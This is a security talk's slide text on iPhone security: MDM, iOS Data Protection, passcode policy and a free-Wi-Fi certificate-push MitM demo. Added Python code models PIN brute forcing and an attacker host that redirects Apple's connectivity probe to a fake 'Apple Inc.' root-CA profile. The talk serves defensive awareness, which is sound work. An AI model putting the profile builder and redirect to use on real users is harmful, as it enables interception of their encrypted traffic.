
Tel +41 55 214 41 60 Fax +41 55 214 41 61 team@csnc.ch www.csnc.ch

Compass Security AG Werkstrasse 20 Postfach 2038 CH-8645 Jona

Welcome to 2nd Beer-Talk

iPhone Security

© Compass Security AG Slide 2 www.csnc.ch

Who am I?

Riccardo Trombini, B.Sc. FHO in Computer Science

Business
•  Working in IT security since 2000
•  Studied Information Technologies at the FH in Rapperswil SG
•  IT Security Analyst, with Compass since 2009

Private
•  In a relationship with …
•  Apple follower, always in the first row
•  iOS developer
•  Social media enthusiast (fb, twitter, foursquare, instagram ..)


An Ideal World

Centralized management with an MDM solution, to
•  Enforce security policies
•  Monitor status of devices
•  Real-time incident handling

Synchronization
•  Encrypted channel
•  Strong authentication

Fully Protected Device
•  Access Control
•  Strong Encryption
•  Vulnerabilities

Fully Aware Users


Sadly there is no such thing


What is MDM?

•  Mobile Device Management

•  Centralized Management of mobile devices


Functionality

•  OTA ("Over The Air") enrollment and profile distribution (config)

•  Easy synchronisation of emails, calendar, contacts, ...

•  Enforce compliance policy

•  Monitor device status for inventory and compliance
   •  Device information (UDID, iOS version, modem version ..)
   •  Network information (carrier settings, data roaming status ..)
   •  Compliance & security (installed profiles, certificates, passcode status ..)

•  Remote administration like
   •  Remote wipe
   •  Remote lock
   •  Passcode reset
   •  Locate device

MDM != MDM – iOS Integration

(diagram: native iOS apps vs. sandbox client)

MDM != MDM – Network Design

(diagram: access via a NOC (Network Operation Center))

(diagram: direct access to the DMZ)


Demo #1

Break passcode protection
Break file encryption on iPhone

iOS Security Controls – Encryption

•  Full Disk Encryption
   •  Since iPhone 3GS
   •  AES CBC 256 bit
   •  Serves only one purpose: rapid device wiping
   •  Against an attacker who holds the device, FDE on its own is pretty useless: the kernel transparently decrypts every requested file

•  Data Protection API
   •  Introduced with iOS 4
   •  Additional level of encryption
   •  File encryption can be tied to the passcode

iOS Security Controls – Encryption: Data Protection API

(diagram of the key hierarchy) File Meta Data holds the File Key, wrapped with a Class Key; the Class Key is protected by the Device Key and, for passcode-bound classes, by the User Passcode Key

BootRom-Attack


Summary

•  User awareness: always know where your device is!

•  Enforce a strong passcode policy with MDM!
   •  Length
   •  Alphanumeric
   •  Special characters
   •  C0mpa$$ … don't!
   •  Usability?
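The following is an added example in Python, not Apple's code and not the demo shown in the talk. It models the key hierarchy from the Data Protection slide (file key in the metadata, wrapped with a class key that depends on the device key and the user passcode key) and then shows why the passcode policy in this summary matters: because the device key is mixed into the passcode key, every guess has to be checked on the device, and the per-attempt cost times the size of the passcode space is the brute-force budget. The toy_wrap() function stands in for AES key wrapping, the keybag verifier is a modelling assumption, and ITERATIONS and SECONDS_PER_ATTEMPT are assumed constants.

```python
"""Simplified model of the iOS Data Protection key hierarchy.

Added example, not Apple's code and not the demo from the talk. toy_wrap() stands
in for AES key wrapping, the keybag verifier is a modelling assumption, and
ITERATIONS / SECONDS_PER_ATTEMPT are assumed constants chosen to show why the
passcode policy decides how long a brute force takes.
"""
import hashlib
import hmac
import itertools
import os
import string

ITERATIONS = 100             # assumed PBKDF2 count; kept small so the demo runs in seconds
SECONDS_PER_ATTEMPT = 0.08   # assumed cost of one on-device passcode attempt


def derive_passcode_key(passcode: str, device_key: bytes) -> bytes:
    """User Passcode Key: the passcode stretched with the Device Key as salt.

    Because the device-bound key is mixed in, a guess can only be checked where
    that key is available, i.e. on the device itself.
    """
    return hashlib.pbkdf2_hmac("sha256", passcode.encode(), device_key, ITERATIONS, dklen=32)


def toy_wrap(key: bytes, kek: bytes) -> bytes:
    """Toy stand-in for AES key wrap: XOR with a keystream derived from the KEK.

    Symmetric, so the same call unwraps. Only for this model, never for real data.
    """
    stream = hmac.new(kek, b"wrap", hashlib.sha256).digest()
    return bytes(a ^ b for a, b in zip(key, stream))


def keystream(key: bytes, length: int) -> bytes:
    """HMAC counter-mode keystream, the model's replacement for AES-CBC file encryption."""
    blocks = (hmac.new(key, i.to_bytes(4, "big"), hashlib.sha256).digest()
              for i in range((length + 31) // 32))
    return b"".join(blocks)[:length]


def build_keybag(passcode: str, device_key: bytes) -> dict:
    """Create a Class Key and store it wrapped under the User Passcode Key."""
    class_key = os.urandom(32)
    wrapped = toy_wrap(class_key, derive_passcode_key(passcode, device_key))
    # The verifier lets the unlock routine recognise the right passcode (assumption).
    return {"wrapped_class_key": wrapped, "verifier": hashlib.sha256(class_key).digest()}


def unlock_class_key(keybag: dict, passcode: str, device_key: bytes):
    """Return the Class Key for a correct passcode, None otherwise."""
    candidate = toy_wrap(keybag["wrapped_class_key"], derive_passcode_key(passcode, device_key))
    if hashlib.sha256(candidate).digest() != keybag["verifier"]:
        return None
    return candidate


def protect_file(plaintext: bytes, class_key: bytes) -> dict:
    """A per-file key encrypts the content; the File Key itself is stored in the
    file metadata wrapped with the Class Key (the hierarchy on the slide)."""
    file_key = os.urandom(32)
    ciphertext = bytes(a ^ b for a, b in zip(plaintext, keystream(file_key, len(plaintext))))
    return {"meta_wrapped_file_key": toy_wrap(file_key, class_key), "ciphertext": ciphertext}


def read_file(protected: dict, class_key: bytes) -> bytes:
    """Unwrap the File Key with the Class Key, then decrypt."""
    file_key = toy_wrap(protected["meta_wrapped_file_key"], class_key)
    ct = protected["ciphertext"]
    return bytes(a ^ b for a, b in zip(ct, keystream(file_key, len(ct))))


def brute_force_pin(keybag: dict, device_key: bytes, digits: int = 4):
    """Try every numeric PIN in order; return (pin, attempts) or (None, attempts)."""
    attempts = 0
    for combo in itertools.product(string.digits, repeat=digits):
        attempts += 1
        pin = "".join(combo)
        if unlock_class_key(keybag, pin, device_key) is not None:
            return pin, attempts
    return None, attempts


def worst_case_seconds(alphabet_size: int, length: int,
                       seconds_per_attempt: float = SECONDS_PER_ATTEMPT) -> float:
    """Time to exhaust the whole passcode space at the assumed per-attempt cost."""
    return alphabet_size ** length * seconds_per_attempt


if __name__ == "__main__":
    device_key = os.urandom(32)                      # constructed stand-in for the per-device key
    keybag = build_keybag("0731", device_key)        # constructed 4-digit passcode
    class_key = unlock_class_key(keybag, "0731", device_key)
    note = protect_file(b"meeting notes: merger Q3", class_key)
    print("decrypted:", read_file(note, class_key))
    print("brute force found:", brute_force_pin(keybag, device_key))
    for name, size, length in [("4 digits", 10, 4), ("6 digits", 10, 6), ("6 alphanumeric", 62, 6)]:
        print(f"{name}: worst case {worst_case_seconds(size, length) / 86400:.1f} days")
```

With the assumed 80 ms per attempt, a 4-digit PIN falls in at most 800 seconds, while six alphanumeric characters need 62^6 attempts, which is far beyond any on-device brute force; that gap, not the encryption algorithm, is what the passcode policy buys.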


Live Demo: Free-WiFi-Cert-Push-Attack

WiFi MitM…

Free-WiFi-Cert-Push-Attack

Free-WiFi Yeah! Free-WiFi available…


Free-WiFi-Cert-Push-Attack

The Problem with the Certificate…

Free-WiFi-Cert-Push-Attack

The Solution ;-)

Free-WiFi-Cert-Push-Attack

Behavior of the iPhone … (diagram)
iPhone -> HTTP GET request -> www.apple.com/library/test/success.html -> OK
iPhone -> HTTP GET request -> Hotspot Management -> Redirect -> Hotspot Login-Site

Free-WiFi-Cert-Push-Attack

Cert-Push … (diagram)
iPhone -> HTTP GET request www.apple.com/library/test/success.html -> Attacker Host -> Redirect -> Mobile Configuration

Free-WiFi-Cert-Push-Attack

Make your own Apple Certificate

Free-WiFi-Cert-Push-Attack

Result…

Free-WiFi-Cert-Push-Attack

MitM with valid Cert (diagram): iPhone -> Free-WiFi -> Attacker Host

Summary

•  User awareness
   •  Think before accepting configurations
   •  Be suspicious

•  Apple should improve certificate validation for mobile configuration

•  Synchronization should be protected with two-way authentication
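The following is an added example in Python, not the talk's demo code, covering both the Cert-Push flow on the slides above and the "think before accepting configurations" advice in this summary. It models the attacker host's answer to the iPhone's connectivity probe (a redirect to a configuration profile instead of the success page), builds the unsigned .mobileconfig that carries a self-made root certificate, and audits such a profile the way a suspicious user or an admin would before tapping Install. The plist keys (PayloadContent, PayloadType "com.apple.security.root") are Apple's configuration profile format; the certificate bytes, identifiers, display names and the profile URL are constructed placeholders and assumptions.

```python
"""Free-WiFi cert push, attacker side and user side, as a model.

Added example, not the talk's demo code. The plist keys are Apple's configuration
profile format; the certificate bytes, identifiers, display names and the profile
URL are constructed placeholders / assumptions.
"""
import plistlib
import uuid

APPLE_PROBE = ("www.apple.com", "/library/test/success.html")
ROOT_CERT_PAYLOAD = "com.apple.security.root"
PROFILE_URL = "http://hotspot.example/free-wifi.mobileconfig"   # assumed attacker URL
# Constructed placeholder for the attacker's self-made "Apple" root CA in DER form.
FAKE_APPLE_ROOT_DER = b"\x30\x82\x01\x00CONSTRUCTED-PLACEHOLDER-NOT-A-REAL-CERTIFICATE"


def hotspot_response(host: str, path: str):
    """What the attacker host returns: the iPhone's connectivity probe gets a
    redirect to the profile instead of the 'Success' page, so the phone opens
    a 'login' page that is really the profile install prompt."""
    if (host, path) == APPLE_PROBE:
        return 302, {"Location": PROFILE_URL}, b""
    return 404, {}, b""


def build_root_ca_profile(cert_der: bytes, display_name: str, organization: str) -> bytes:
    """Unsigned .mobileconfig carrying one root-certificate payload.

    display_name / organization are free text chosen by whoever made the
    profile, which is why 'Apple Inc.' in the prompt proves nothing.
    """
    profile = {
        "PayloadType": "Configuration",
        "PayloadVersion": 1,
        "PayloadIdentifier": "com.example.freewifi",          # assumed identifier
        "PayloadUUID": str(uuid.uuid4()),
        "PayloadDisplayName": display_name,
        "PayloadOrganization": organization,
        "PayloadContent": [{
            "PayloadType": ROOT_CERT_PAYLOAD,
            "PayloadVersion": 1,
            "PayloadIdentifier": "com.example.freewifi.root",  # assumed identifier
            "PayloadUUID": str(uuid.uuid4()),
            "PayloadDisplayName": display_name,
            "PayloadContent": cert_der,                        # DER certificate -> <data>
        }],
    }
    return plistlib.dumps(profile)


def audit_profile(data: bytes) -> list:
    """Findings a user or admin wants to see before tapping 'Install'."""
    try:
        profile = plistlib.loads(data)
    except Exception:
        # A signed profile is a CMS/PKCS#7 blob, not a bare plist: check the signer instead.
        return ["not a plain plist: either a signed profile (verify the signer) or not a profile"]
    findings = ["unsigned profile: display name and organization are attacker-chosen strings, "
                "not verified identities"]
    for payload in profile.get("PayloadContent", []):
        ptype = payload.get("PayloadType", "?")
        if ptype == ROOT_CERT_PAYLOAD:
            cert = payload.get("PayloadContent", b"")
            findings.append(f"installs root certificate '{payload.get('PayloadDisplayName')}' "
                            f"({len(cert)} bytes DER): TLS connections will trust it, "
                            "enabling a MitM with a 'valid' certificate")
        else:
            findings.append(f"payload of type {ptype}")
    return findings


if __name__ == "__main__":
    status, headers, _ = hotspot_response(*APPLE_PROBE)
    print("probe answered with", status, headers)
    profile = build_root_ca_profile(FAKE_APPLE_ROOT_DER, "Apple Inc.", "Apple Inc.")
    for line in audit_profile(profile):
        print("-", line)
```

The audit deliberately treats "unsigned" as a finding in itself: an unsigned profile parses as a bare XML plist, and nothing in it binds the displayed organization to anyone, which is exactly the validation gap the summary asks Apple to close.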


Questions ?
